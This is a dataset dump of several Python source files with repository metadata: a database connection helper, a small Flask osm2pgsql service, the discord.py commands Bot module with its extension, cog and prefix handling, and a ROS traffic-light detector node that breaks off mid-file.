def connection(database_name=None, commit=False, cache_minimize=False, reuse=False):
"""
Shortcut for :meth:`sheraf.databases.Database.connection`
:param database_name: The name of the database on which to open a connection.
If not set, the default database will be used.
:param *kwargs: See :meth:`sheraf.databases.Database.connection` arguments.
"""
database = Database.get(database_name)
with database.connection(
commit=commit,
cache_minimize=cache_minimize,
reuse=reuse,
_trackeback_shift=2,
) as conn:
yield conn
| 33.910026 | 125 | 0.627852 |
62f6c3e9d67d2ffec74359366959a98bb2427112 | 811 | py | Python | roles/osm2pgsql/templates/main.j2.py | cobra79/GeoGeekSuite | fc8e43a9e8dffa6b41b5b4671f674bee6f60785d | [
"Apache-2.0"
] | null | null | null | roles/osm2pgsql/templates/main.j2.py | cobra79/GeoGeekSuite | fc8e43a9e8dffa6b41b5b4671f674bee6f60785d | [
"Apache-2.0"
] | null | null | null | roles/osm2pgsql/templates/main.j2.py | cobra79/GeoGeekSuite | fc8e43a9e8dffa6b41b5b4671f674bee6f60785d | [
"Apache-2.0"
] | null | null | null | import cobra.helper.logging as logging
import cobra.tools.osm2pgsql as osm
from flask import Flask, request, jsonify
app = Flask(__name__)
l = logging.Logger('Osm2pgsql Flask')
l.debug('Start Cobra Logging')
#TODO: Schema handling
osm.Osm2PgSql(run_in_loop = True)
@app.route('/')
def hello_world():
l.debug('hello osm')
return 'Hello, osm!'
#@app.route('/load_shape', methods=['POST'])
#def load_shape():
# app.logger.info('load_shape')
# data = request.json
# g = cobra_gdal.cobra_gdal()
# try:
# app.logger.debug(data)
# #app.logger.info(f'{data['path']}')
# g.shape2pg(data.get('path'))
# except Exception as inst:
# app.logger.error(inst)
# finally:
# return jsonify(data)
if __name__ == '__main__':
app.run(debug=True, host='0.0.0.0') | 24.575758 | 44 | 0.649815 |
cba7d1e0ad8a18494f02f0bc44fe38a363db76b4 | 37,033 | py | Python | discord/ext/commands/bot.py | ToxicKidz/discord.py | bba4d6c4e4df418ba98d46a95c3f472a67a042b6 | [
"MIT"
] | 13 | 2020-12-16T06:13:11.000Z | 2021-04-15T12:01:38.000Z | discord/ext/commands/bot.py | ToxicKidz/discord.py | bba4d6c4e4df418ba98d46a95c3f472a67a042b6 | [
"MIT"
] | 1 | 2022-02-26T08:28:44.000Z | 2022-02-26T08:28:44.000Z | discord/ext/commands/bot.py | ToxicKidz/discord.py | bba4d6c4e4df418ba98d46a95c3f472a67a042b6 | [
"MIT"
] | 6 | 2020-12-16T00:01:24.000Z | 2021-02-05T12:32:54.000Z | """
The MIT License (MIT)
Copyright (c) 2015-present Rapptz
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
import asyncio
import collections
import inspect
import importlib.util
import sys
import traceback
import types
import discord
from .core import GroupMixin
from .view import StringView
from .context import Context
from . import errors
from .help import HelpCommand, DefaultHelpCommand
from .cog import Cog
__all__ = (
'when_mentioned',
'when_mentioned_or',
'Bot',
'AutoShardedBot',
)
def when_mentioned(bot, msg):
"""A callable that implements a command prefix equivalent to being mentioned.
These are meant to be passed into the :attr:`.Bot.command_prefix` attribute.
"""
return [f'<@{bot.user.id}> ', f'<@!{bot.user.id}> ']
def when_mentioned_or(*prefixes):
"""A callable that implements when mentioned or other prefixes provided.
These are meant to be passed into the :attr:`.Bot.command_prefix` attribute.
Example
--------
.. code-block:: python3
bot = commands.Bot(command_prefix=commands.when_mentioned_or('!'))
.. note::
This callable returns another callable, so if this is done inside a custom
callable, you must call the returned callable, for example:
.. code-block:: python3
async def get_prefix(bot, message):
extras = await prefixes_for(message.guild) # returns a list
return commands.when_mentioned_or(*extras)(bot, message)
See Also
----------
:func:`.when_mentioned`
"""
def inner(bot, msg):
r = list(prefixes)
r = when_mentioned(bot, msg) + r
return r
return inner
def _is_submodule(parent, child):
return parent == child or child.startswith(parent + ".")
class _DefaultRepr:
def __repr__(self):
return '<default-help-command>'
_default = _DefaultRepr()
class BotBase(GroupMixin):
def __init__(self, command_prefix, help_command=_default, description=None, **options):
super().__init__(**options)
self.command_prefix = command_prefix
self.extra_events = {}
self.__cogs = {}
self.__extensions = {}
self._checks = []
self._check_once = []
self._before_invoke = None
self._after_invoke = None
self._help_command = None
self.description = inspect.cleandoc(description) if description else ''
self.owner_id = options.get('owner_id')
self.owner_ids = options.get('owner_ids', set())
self.strip_after_prefix = options.get('strip_after_prefix', False)
if self.owner_id and self.owner_ids:
raise TypeError('Both owner_id and owner_ids are set.')
if self.owner_ids and not isinstance(self.owner_ids, collections.abc.Collection):
raise TypeError(f'owner_ids must be a collection not {self.owner_ids.__class__!r}')
if help_command is _default:
self.help_command = DefaultHelpCommand()
else:
self.help_command = help_command
# internal helpers
def dispatch(self, event_name, *args, **kwargs):
super().dispatch(event_name, *args, **kwargs)
ev = 'on_' + event_name
for event in self.extra_events.get(ev, []):
self._schedule_event(event, ev, *args, **kwargs)
async def close(self):
for extension in tuple(self.__extensions):
try:
self.unload_extension(extension)
except Exception:
pass
for cog in tuple(self.__cogs):
try:
self.remove_cog(cog)
except Exception:
pass
await super().close()
async def on_command_error(self, context, exception):
"""|coro|
The default command error handler provided by the bot.
By default this prints to :data:`sys.stderr` however it could be
overridden to have a different implementation.
This only fires if you do not specify any listeners for command error.
"""
if self.extra_events.get('on_command_error', None):
return
command = context.command
if command and command.has_error_handler():
return
cog = context.cog
if cog and cog.has_error_handler():
return
print(f'Ignoring exception in command {context.command}:', file=sys.stderr)
traceback.print_exception(type(exception), exception, exception.__traceback__, file=sys.stderr)
# global check registration
def check(self, func):
r"""A decorator that adds a global check to the bot.
A global check is similar to a :func:`.check` that is applied
on a per command basis except it is run before any command checks
have been verified and applies to every command the bot has.
.. note::
This function can either be a regular function or a coroutine.
Similar to a command :func:`.check`\, this takes a single parameter
of type :class:`.Context` and can only raise exceptions inherited from
:exc:`.CommandError`.
Example
---------
.. code-block:: python3
@bot.check
def check_commands(ctx):
return ctx.command.qualified_name in allowed_commands
"""
self.add_check(func)
return func
def add_check(self, func, *, call_once=False):
"""Adds a global check to the bot.
This is the non-decorator interface to :meth:`.check`
and :meth:`.check_once`.
Parameters
-----------
func
The function that was used as a global check.
call_once: :class:`bool`
If the function should only be called once per
:meth:`.invoke` call.
"""
if call_once:
self._check_once.append(func)
else:
self._checks.append(func)
def remove_check(self, func, *, call_once=False):
"""Removes a global check from the bot.
This function is idempotent and will not raise an exception
if the function is not in the global checks.
Parameters
-----------
func
The function to remove from the global checks.
call_once: :class:`bool`
If the function was added with ``call_once=True`` in
the :meth:`.Bot.add_check` call or using :meth:`.check_once`.
"""
l = self._check_once if call_once else self._checks
try:
l.remove(func)
except ValueError:
pass
def check_once(self, func):
r"""A decorator that adds a "call once" global check to the bot.
Unlike regular global checks, this one is called only once
per :meth:`.invoke` call.
Regular global checks are called whenever a command is called
or :meth:`.Command.can_run` is called. This type of check
bypasses that and ensures that it's called only once, even inside
the default help command.
.. note::
When using this function the :class:`.Context` sent to a group subcommand
may only parse the parent command and not the subcommands due to it
being invoked once per :meth:`.Bot.invoke` call.
.. note::
This function can either be a regular function or a coroutine.
Similar to a command :func:`.check`\, this takes a single parameter
of type :class:`.Context` and can only raise exceptions inherited from
:exc:`.CommandError`.
Example
---------
.. code-block:: python3
@bot.check_once
def whitelist(ctx):
return ctx.message.author.id in my_whitelist
"""
self.add_check(func, call_once=True)
return func
async def can_run(self, ctx, *, call_once=False):
data = self._check_once if call_once else self._checks
if len(data) == 0:
return True
return await discord.utils.async_all(f(ctx) for f in data)
async def is_owner(self, user):
"""|coro|
Checks if a :class:`~discord.User` or :class:`~discord.Member` is the owner of
this bot.
If an :attr:`owner_id` is not set, it is fetched automatically
through the use of :meth:`~.Bot.application_info`.
.. versionchanged:: 1.3
The function also checks if the application is team-owned if
:attr:`owner_ids` is not set.
Parameters
-----------
user: :class:`.abc.User`
The user to check for.
Returns
--------
:class:`bool`
Whether the user is the owner.
"""
if self.owner_id:
return user.id == self.owner_id
elif self.owner_ids:
return user.id in self.owner_ids
else:
app = await self.application_info()
if app.team:
self.owner_ids = ids = {m.id for m in app.team.members}
return user.id in ids
else:
self.owner_id = owner_id = app.owner.id
return user.id == owner_id
def before_invoke(self, coro):
"""A decorator that registers a coroutine as a pre-invoke hook.
A pre-invoke hook is called directly before the command is
called. This makes it a useful function to set up database
connections or any type of set up required.
This pre-invoke hook takes a sole parameter, a :class:`.Context`.
.. note::
The :meth:`~.Bot.before_invoke` and :meth:`~.Bot.after_invoke` hooks are
only called if all checks and argument parsing procedures pass
without error. If any check or argument parsing procedures fail
then the hooks are not called.
Parameters
-----------
coro: :ref:`coroutine <coroutine>`
The coroutine to register as the pre-invoke hook.
Raises
-------
TypeError
The coroutine passed is not actually a coroutine.
"""
if not asyncio.iscoroutinefunction(coro):
raise TypeError('The pre-invoke hook must be a coroutine.')
self._before_invoke = coro
return coro
def after_invoke(self, coro):
r"""A decorator that registers a coroutine as a post-invoke hook.
A post-invoke hook is called directly after the command is
called. This makes it a useful function to clean-up database
connections or any type of clean up required.
This post-invoke hook takes a sole parameter, a :class:`.Context`.
.. note::
Similar to :meth:`~.Bot.before_invoke`\, this is not called unless
checks and argument parsing procedures succeed. This hook is,
however, **always** called regardless of the internal command
callback raising an error (i.e. :exc:`.CommandInvokeError`\).
This makes it ideal for clean-up scenarios.
Parameters
-----------
coro: :ref:`coroutine <coroutine>`
The coroutine to register as the post-invoke hook.
Raises
-------
TypeError
The coroutine passed is not actually a coroutine.
"""
if not asyncio.iscoroutinefunction(coro):
raise TypeError('The post-invoke hook must be a coroutine.')
self._after_invoke = coro
return coro
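    # Illustrative sketch (not part of the library): the pre-/post-invoke hooks
    # above are typically paired to set up and tear down a resource around every
    # command; ``bot`` and ``acquire_db_connection`` are hypothetical names.
    #
    #     @bot.before_invoke
    #     async def open_db(ctx):
    #         ctx.db = await acquire_db_connection()
    #
    #     @bot.after_invoke
    #     async def close_db(ctx):
    #         await ctx.db.close()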
# listener registration
def add_listener(self, func, name=None):
"""The non decorator alternative to :meth:`.listen`.
Parameters
-----------
func: :ref:`coroutine <coroutine>`
The function to call.
name: Optional[:class:`str`]
The name of the event to listen for. Defaults to ``func.__name__``.
Example
--------
.. code-block:: python3
async def on_ready(): pass
async def my_message(message): pass
bot.add_listener(on_ready)
bot.add_listener(my_message, 'on_message')
"""
name = func.__name__ if name is None else name
if not asyncio.iscoroutinefunction(func):
raise TypeError('Listeners must be coroutines')
if name in self.extra_events:
self.extra_events[name].append(func)
else:
self.extra_events[name] = [func]
def remove_listener(self, func, name=None):
"""Removes a listener from the pool of listeners.
Parameters
-----------
func
The function that was used as a listener to remove.
name: :class:`str`
The name of the event we want to remove. Defaults to
``func.__name__``.
"""
name = func.__name__ if name is None else name
if name in self.extra_events:
try:
self.extra_events[name].remove(func)
except ValueError:
pass
def listen(self, name=None):
"""A decorator that registers another function as an external
event listener. Basically this allows you to listen to multiple
events from different places e.g. such as :func:`.on_ready`
The functions being listened to must be a :ref:`coroutine <coroutine>`.
Example
--------
.. code-block:: python3
@bot.listen()
async def on_message(message):
print('one')
# in some other file...
@bot.listen('on_message')
async def my_message(message):
print('two')
Would print one and two in an unspecified order.
Raises
-------
TypeError
The function being listened to is not a coroutine.
"""
def decorator(func):
self.add_listener(func, name)
return func
return decorator
# cogs
def add_cog(self, cog: Cog, *, override: bool = False) -> None:
"""Adds a "cog" to the bot.
A cog is a class that has its own event listeners and commands.
.. versionchanged:: 2.0
:exc:`.ClientException` is raised when a cog with the same name
is already loaded.
Parameters
-----------
cog: :class:`.Cog`
The cog to register to the bot.
override: :class:`bool`
If a previously loaded cog with the same name should be ejected
instead of raising an error.
.. versionadded:: 2.0
Raises
-------
TypeError
The cog does not inherit from :class:`.Cog`.
CommandError
An error happened during loading.
.ClientException
A cog with the same name is already loaded.
"""
if not isinstance(cog, Cog):
raise TypeError('cogs must derive from Cog')
cog_name = cog.__cog_name__
existing = self.__cogs.get(cog_name)
if existing is not None:
if not override:
raise discord.ClientException(f'Cog named {cog_name!r} already loaded')
self.remove_cog(cog_name)
cog = cog._inject(self)
self.__cogs[cog_name] = cog
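    # Minimal usage sketch for add_cog (illustrative only; ``Greetings`` and
    # ``bot`` are hypothetical names, not part of this module):
    #
    #     class Greetings(commands.Cog):
    #         @commands.command()
    #         async def hello(self, ctx):
    #             await ctx.send('Hello!')
    #
    #     bot.add_cog(Greetings())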
def get_cog(self, name):
"""Gets the cog instance requested.
If the cog is not found, ``None`` is returned instead.
Parameters
-----------
name: :class:`str`
The name of the cog you are requesting.
This is equivalent to the name passed via keyword
argument in class creation or the class name if unspecified.
Returns
--------
Optional[:class:`Cog`]
The cog that was requested. If not found, returns ``None``.
"""
return self.__cogs.get(name)
def remove_cog(self, name):
"""Removes a cog from the bot.
All registered commands and event listeners that the
cog has registered will be removed as well.
If no cog is found then this method has no effect.
Parameters
-----------
name: :class:`str`
The name of the cog to remove.
"""
cog = self.__cogs.pop(name, None)
if cog is None:
return
help_command = self._help_command
if help_command and help_command.cog is cog:
help_command.cog = None
cog._eject(self)
@property
def cogs(self):
"""Mapping[:class:`str`, :class:`Cog`]: A read-only mapping of cog name to cog."""
return types.MappingProxyType(self.__cogs)
# extensions
def _remove_module_references(self, name):
# find all references to the module
# remove the cogs registered from the module
for cogname, cog in self.__cogs.copy().items():
if _is_submodule(name, cog.__module__):
self.remove_cog(cogname)
# remove all the commands from the module
for cmd in self.all_commands.copy().values():
if cmd.module is not None and _is_submodule(name, cmd.module):
if isinstance(cmd, GroupMixin):
cmd.recursively_remove_all_commands()
self.remove_command(cmd.name)
# remove all the listeners from the module
for event_list in self.extra_events.copy().values():
remove = []
for index, event in enumerate(event_list):
if event.__module__ is not None and _is_submodule(name, event.__module__):
remove.append(index)
for index in reversed(remove):
del event_list[index]
def _call_module_finalizers(self, lib, key):
try:
func = getattr(lib, 'teardown')
except AttributeError:
pass
else:
try:
func(self)
except Exception:
pass
finally:
self.__extensions.pop(key, None)
sys.modules.pop(key, None)
name = lib.__name__
for module in list(sys.modules.keys()):
if _is_submodule(name, module):
del sys.modules[module]
def _load_from_module_spec(self, spec, key):
# precondition: key not in self.__extensions
lib = importlib.util.module_from_spec(spec)
sys.modules[key] = lib
try:
spec.loader.exec_module(lib)
except Exception as e:
del sys.modules[key]
raise errors.ExtensionFailed(key, e) from e
try:
setup = getattr(lib, 'setup')
except AttributeError:
del sys.modules[key]
raise errors.NoEntryPointError(key)
try:
setup(self)
except Exception as e:
del sys.modules[key]
self._remove_module_references(lib.__name__)
self._call_module_finalizers(lib, key)
raise errors.ExtensionFailed(key, e) from e
else:
self.__extensions[key] = lib
def _resolve_name(self, name, package):
try:
return importlib.util.resolve_name(name, package)
except ImportError:
raise errors.ExtensionNotFound(name)
def load_extension(self, name, *, package=None):
"""Loads an extension.
An extension is a python module that contains commands, cogs, or
listeners.
An extension must have a global function, ``setup`` defined as
the entry point on what to do when the extension is loaded. This entry
point must have a single argument, the ``bot``.
Parameters
------------
name: :class:`str`
The extension name to load. It must be dot separated like
regular Python imports if accessing a sub-module. e.g.
``foo.test`` if you want to import ``foo/test.py``.
package: Optional[:class:`str`]
The package name to resolve relative imports with.
This is required when loading an extension using a relative path, e.g ``.foo.test``.
Defaults to ``None``.
.. versionadded:: 1.7
Raises
--------
ExtensionNotFound
The extension could not be imported.
This is also raised if the name of the extension could not
be resolved using the provided ``package`` parameter.
ExtensionAlreadyLoaded
The extension is already loaded.
NoEntryPointError
The extension does not have a setup function.
ExtensionFailed
The extension or its setup function had an execution error.
"""
name = self._resolve_name(name, package)
if name in self.__extensions:
raise errors.ExtensionAlreadyLoaded(name)
spec = importlib.util.find_spec(name)
if spec is None:
raise errors.ExtensionNotFound(name)
self._load_from_module_spec(spec, name)
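    # Sketch of a matching extension module (the file ``cogs/music.py`` and the
    # ``Music`` cog are hypothetical): the only requirement described above is a
    # module-level ``setup(bot)`` entry point.
    #
    #     # cogs/music.py
    #     def setup(bot):
    #         bot.add_cog(Music(bot))
    #
    # which would then be loaded with ``bot.load_extension('cogs.music')``.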
def unload_extension(self, name, *, package=None):
"""Unloads an extension.
When the extension is unloaded, all commands, listeners, and cogs are
removed from the bot and the module is un-imported.
The extension can provide an optional global function, ``teardown``,
to do miscellaneous clean-up if necessary. This function takes a single
parameter, the ``bot``, similar to ``setup`` from
:meth:`~.Bot.load_extension`.
Parameters
------------
name: :class:`str`
The extension name to unload. It must be dot separated like
regular Python imports if accessing a sub-module. e.g.
``foo.test`` if you want to import ``foo/test.py``.
package: Optional[:class:`str`]
The package name to resolve relative imports with.
This is required when unloading an extension using a relative path, e.g ``.foo.test``.
Defaults to ``None``.
.. versionadded:: 1.7
Raises
-------
ExtensionNotFound
The name of the extension could not
be resolved using the provided ``package`` parameter.
ExtensionNotLoaded
The extension was not loaded.
"""
name = self._resolve_name(name, package)
lib = self.__extensions.get(name)
if lib is None:
raise errors.ExtensionNotLoaded(name)
self._remove_module_references(lib.__name__)
self._call_module_finalizers(lib, name)
def reload_extension(self, name, *, package=None):
"""Atomically reloads an extension.
This replaces the extension with the same extension, only refreshed. This is
equivalent to a :meth:`unload_extension` followed by a :meth:`load_extension`
except done in an atomic way. That is, if an operation fails mid-reload then
the bot will roll-back to the prior working state.
Parameters
------------
name: :class:`str`
The extension name to reload. It must be dot separated like
regular Python imports if accessing a sub-module. e.g.
``foo.test`` if you want to import ``foo/test.py``.
package: Optional[:class:`str`]
The package name to resolve relative imports with.
This is required when reloading an extension using a relative path, e.g ``.foo.test``.
Defaults to ``None``.
.. versionadded:: 1.7
Raises
-------
ExtensionNotLoaded
The extension was not loaded.
ExtensionNotFound
The extension could not be imported.
This is also raised if the name of the extension could not
be resolved using the provided ``package`` parameter.
NoEntryPointError
The extension does not have a setup function.
ExtensionFailed
The extension setup function had an execution error.
"""
name = self._resolve_name(name, package)
lib = self.__extensions.get(name)
if lib is None:
raise errors.ExtensionNotLoaded(name)
# get the previous module states from sys modules
modules = {
name: module
for name, module in sys.modules.items()
if _is_submodule(lib.__name__, name)
}
try:
# Unload and then load the module...
self._remove_module_references(lib.__name__)
self._call_module_finalizers(lib, name)
self.load_extension(name)
except Exception:
# if the load failed, the remnants should have been
# cleaned from the load_extension function call
# so let's load it from our old compiled library.
lib.setup(self)
self.__extensions[name] = lib
# revert sys.modules back to normal and raise back to caller
sys.modules.update(modules)
raise
@property
def extensions(self):
"""Mapping[:class:`str`, :class:`py:types.ModuleType`]: A read-only mapping of extension name to extension."""
return types.MappingProxyType(self.__extensions)
# help command stuff
@property
def help_command(self):
return self._help_command
@help_command.setter
def help_command(self, value):
if value is not None:
if not isinstance(value, HelpCommand):
raise TypeError('help_command must be a subclass of HelpCommand')
if self._help_command is not None:
self._help_command._remove_from_bot(self)
self._help_command = value
value._add_to_bot(self)
elif self._help_command is not None:
self._help_command._remove_from_bot(self)
self._help_command = None
else:
self._help_command = None
# command processing
async def get_prefix(self, message):
"""|coro|
Retrieves the prefix the bot is listening to
with the message as a context.
Parameters
-----------
message: :class:`discord.Message`
The message context to get the prefix of.
Returns
--------
Union[List[:class:`str`], :class:`str`]
A list of prefixes or a single prefix that the bot is
listening for.
"""
prefix = ret = self.command_prefix
if callable(prefix):
ret = await discord.utils.maybe_coroutine(prefix, self, message)
if not isinstance(ret, str):
try:
ret = list(ret)
except TypeError:
# It's possible that a generator raised this exception. Don't
# replace it with our own error if that's the case.
if isinstance(ret, collections.abc.Iterable):
raise
raise TypeError("command_prefix must be plain string, iterable of strings, or callable "
f"returning either of these, not {ret.__class__.__name__}")
if not ret:
raise ValueError("Iterable command_prefix must contain at least one prefix")
return ret
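    # Illustrative sketch of the callable-prefix contract described above;
    # ``fetch_prefix_for`` is a hypothetical per-guild lookup, not library API.
    #
    #     async def dynamic_prefix(bot, message):
    #         if message.guild is None:
    #             return ['!', '?']
    #         return await fetch_prefix_for(message.guild.id)
    #
    #     bot = commands.Bot(command_prefix=dynamic_prefix)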
async def get_context(self, message, *, cls=Context):
r"""|coro|
Returns the invocation context from the message.
This is a more low-level counter-part for :meth:`.process_commands`
to allow users more fine grained control over the processing.
The returned context is not guaranteed to be a valid invocation
context, :attr:`.Context.valid` must be checked to make sure it is.
If the context is not valid then it is not a valid candidate to be
invoked under :meth:`~.Bot.invoke`.
Parameters
-----------
message: :class:`discord.Message`
The message to get the invocation context from.
cls
The factory class that will be used to create the context.
By default, this is :class:`.Context`. Should a custom
class be provided, it must be similar enough to :class:`.Context`\'s
interface.
Returns
--------
:class:`.Context`
The invocation context. The type of this can change via the
``cls`` parameter.
"""
view = StringView(message.content)
ctx = cls(prefix=None, view=view, bot=self, message=message)
if message.author.id == self.user.id:
return ctx
prefix = await self.get_prefix(message)
invoked_prefix = prefix
if isinstance(prefix, str):
if not view.skip_string(prefix):
return ctx
else:
try:
# if the context class' __init__ consumes something from the view this
# will be wrong. That seems unreasonable though.
if message.content.startswith(tuple(prefix)):
invoked_prefix = discord.utils.find(view.skip_string, prefix)
else:
return ctx
except TypeError:
if not isinstance(prefix, list):
raise TypeError("get_prefix must return either a string or a list of string, "
f"not {prefix.__class__.__name__}")
# It's possible a bad command_prefix got us here.
for value in prefix:
if not isinstance(value, str):
raise TypeError("Iterable command_prefix or list returned from get_prefix must "
f"contain only strings, not {value.__class__.__name__}")
# Getting here shouldn't happen
raise
if self.strip_after_prefix:
view.skip_ws()
invoker = view.get_word()
ctx.invoked_with = invoker
ctx.prefix = invoked_prefix
ctx.command = self.all_commands.get(invoker)
return ctx
async def invoke(self, ctx):
"""|coro|
Invokes the command given under the invocation context and
handles all the internal event dispatch mechanisms.
Parameters
-----------
ctx: :class:`.Context`
The invocation context to invoke.
"""
if ctx.command is not None:
self.dispatch('command', ctx)
try:
if await self.can_run(ctx, call_once=True):
await ctx.command.invoke(ctx)
else:
raise errors.CheckFailure('The global check once functions failed.')
except errors.CommandError as exc:
await ctx.command.dispatch_error(ctx, exc)
else:
self.dispatch('command_completion', ctx)
elif ctx.invoked_with:
exc = errors.CommandNotFound(f'Command "{ctx.invoked_with}" is not found')
self.dispatch('command_error', ctx, exc)
async def process_commands(self, message):
"""|coro|
This function processes the commands that have been registered
to the bot and other groups. Without this coroutine, none of the
commands will be triggered.
By default, this coroutine is called inside the :func:`.on_message`
event. If you choose to override the :func:`.on_message` event, then
you should invoke this coroutine as well.
This is built using other low level tools, and is equivalent to a
call to :meth:`~.Bot.get_context` followed by a call to :meth:`~.Bot.invoke`.
This also checks if the message's author is a bot and doesn't
call :meth:`~.Bot.get_context` or :meth:`~.Bot.invoke` if so.
Parameters
-----------
message: :class:`discord.Message`
The message to process commands for.
"""
if message.author.bot:
return
ctx = await self.get_context(message)
await self.invoke(ctx)
async def on_message(self, message):
await self.process_commands(message)
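    # Sketch of the override pattern the docstring above warns about
    # (illustrative only): a custom on_message must still forward the message
    # to process_commands, otherwise no command will ever be invoked.
    #
    #     @bot.event
    #     async def on_message(message):
    #         if message.content.startswith('ping'):
    #             await message.channel.send('pong')
    #         await bot.process_commands(message)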
class Bot(BotBase, discord.Client):
"""Represents a discord bot.
This class is a subclass of :class:`discord.Client` and as a result
anything that you can do with a :class:`discord.Client` you can do with
this bot.
This class also subclasses :class:`.GroupMixin` to provide the functionality
to manage commands.
Attributes
-----------
command_prefix
The command prefix is what the message content must contain initially
to have a command invoked. This prefix could either be a string to
indicate what the prefix should be, or a callable that takes in the bot
as its first parameter and :class:`discord.Message` as its second
parameter and returns the prefix. This is to facilitate "dynamic"
command prefixes. This callable can be either a regular function or
a coroutine.
An empty string as the prefix always matches, enabling prefix-less
command invocation. While this may be useful in DMs it should be avoided
in servers, as it's likely to cause performance issues and unintended
command invocations.
The command prefix could also be an iterable of strings indicating that
multiple checks for the prefix should be used and the first one to
match will be the invocation prefix. You can get this prefix via
:attr:`.Context.prefix`. To avoid confusion empty iterables are not
allowed.
.. note::
When passing multiple prefixes be careful to not pass a prefix
that matches a longer prefix occurring later in the sequence. For
example, if the command prefix is ``('!', '!?')`` the ``'!?'``
prefix will never be matched to any message as the previous one
matches messages starting with ``!?``. This is especially important
when passing an empty string, it should always be last as no prefix
after it will be matched.
case_insensitive: :class:`bool`
Whether the commands should be case insensitive. Defaults to ``False``. This
attribute does not carry over to groups. You must set it to every group if
you require group commands to be case insensitive as well.
description: :class:`str`
The content prefixed into the default help message.
help_command: Optional[:class:`.HelpCommand`]
The help command implementation to use. This can be dynamically
set at runtime. To remove the help command pass ``None``. For more
information on implementing a help command, see :ref:`ext_commands_help_command`.
owner_id: Optional[:class:`int`]
The user ID that owns the bot. If this is not set and is then queried via
:meth:`.is_owner` then it is fetched automatically using
:meth:`~.Bot.application_info`.
owner_ids: Optional[Collection[:class:`int`]]
        The user IDs that own the bot. This is similar to :attr:`owner_id`.
If this is not set and the application is team based, then it is
fetched automatically using :meth:`~.Bot.application_info`.
For performance reasons it is recommended to use a :class:`set`
for the collection. You cannot set both ``owner_id`` and ``owner_ids``.
.. versionadded:: 1.3
strip_after_prefix: :class:`bool`
Whether to strip whitespace characters after encountering the command
prefix. This allows for ``! hello`` and ``!hello`` to both work if
the ``command_prefix`` is set to ``!``. Defaults to ``False``.
.. versionadded:: 1.7
"""
pass
class AutoShardedBot(BotBase, discord.AutoShardedClient):
"""This is similar to :class:`.Bot` except that it is inherited from
:class:`discord.AutoShardedClient` instead.
"""
pass
| 34.321594 | 118 | 0.604245 |
a4a89712613ffd58bba52e5e6019655b39976691 | 6,330 | py | Python | ros/src/tl_detector/tl_detector.py | AlexanderKim/CarND-Capstone | 99d7fb010bba961fe5f9416b6232e9904b8b691d | ["MIT"] | null | null | null | ros/src/tl_detector/tl_detector.py | AlexanderKim/CarND-Capstone | 99d7fb010bba961fe5f9416b6232e9904b8b691d | ["MIT"] | null | null | null | ros/src/tl_detector/tl_detector.py | AlexanderKim/CarND-Capstone | 99d7fb010bba961fe5f9416b6232e9904b8b691d | ["MIT"] | null | null | null |
#!/usr/bin/env python
import rospy
from std_msgs.msg import Int32
from geometry_msgs.msg import PoseStamped, Pose
from styx_msgs.msg import TrafficLightArray, TrafficLight
from styx_msgs.msg import Lane
from sensor_msgs.msg import Image
from cv_bridge import CvBridge
from light_classification.tl_classifier import TLClassifier
import tf
import cv2
import yaml
from scipy.spatial import KDTree
STATE_COUNT_THRESHOLD = 3
class TLDetector(object):
def __init__(self):
rospy.init_node('tl_detector')
self.pose = None
self.waypoints = None
self.camera_image = None
self.lights = []
self.waypoints_2d = None
self.waypoint_tree = None
sub1 = rospy.Subscriber('/current_pose', PoseStamped, self.pose_cb)
sub2 = rospy.Subscriber('/base_waypoints', Lane, self.waypoints_cb)
'''
/vehicle/traffic_lights provides you with the location of the traffic light in 3D map space and
helps you acquire an accurate ground truth data source for the traffic light
classifier by sending the current color state of all traffic lights in the
simulator. When testing on the vehicle, the color state will not be available. You'll need to
rely on the position of the light and the camera image to predict it.
'''
sub3 = rospy.Subscriber('/vehicle/traffic_lights', TrafficLightArray, self.traffic_cb)
sub6 = rospy.Subscriber('/image_color', Image, self.image_cb)
config_string = rospy.get_param("/traffic_light_config")
self.config = yaml.load(config_string)
self.upcoming_red_light_pub = rospy.Publisher('/traffic_waypoint', Int32, queue_size=1)
self.bridge = CvBridge()
self.light_classifier = TLClassifier()
self.listener = tf.TransformListener()
self.state = TrafficLight.UNKNOWN
self.last_state = TrafficLight.UNKNOWN
self.last_wp = -1
self.state_count = 0
rospy.spin()
def pose_cb(self, msg):
self.pose = msg
def waypoints_cb(self, waypoints):
self.waypoints = waypoints
if not self.waypoints_2d:
self.waypoints_2d = [[waypoint.pose.pose.position.x, waypoint.pose.pose.position.y] for waypoint in waypoints.waypoints]
self.waypoint_tree = KDTree(self.waypoints_2d)
def traffic_cb(self, msg):
self.lights = msg.lights
def image_cb(self, msg):
"""Identifies red lights in the incoming camera image and publishes the index
of the waypoint closest to the red light's stop line to /traffic_waypoint
Args:
msg (Image): image from car-mounted camera
"""
self.has_image = True
self.camera_image = msg
light_wp, state = self.process_traffic_lights()
'''
Publish upcoming red lights at camera frequency.
Each predicted state has to occur `STATE_COUNT_THRESHOLD` number
of times till we start using it. Otherwise the previous stable state is
used.
'''
if self.state != state:
self.state_count = 0
self.state = state
elif self.state_count >= STATE_COUNT_THRESHOLD:
self.last_state = self.state
light_wp = light_wp if state == TrafficLight.RED else -1
self.last_wp = light_wp
self.upcoming_red_light_pub.publish(Int32(light_wp))
else:
self.upcoming_red_light_pub.publish(Int32(self.last_wp))
self.state_count += 1
# def get_closest_waypoint(self, pose):
def get_closest_waypoint(self, x, y):
"""Identifies the closest path waypoint to the given position
https://en.wikipedia.org/wiki/Closest_pair_of_points_problem
Args:
            x (float): x coordinate of the position to match a waypoint to
            y (float): y coordinate of the position to match a waypoint to
Returns:
int: index of the closest waypoint in self.waypoints
"""
#TODO implement
closest_idx = self.waypoint_tree.query([x, y], 1)[1]
return closest_idx
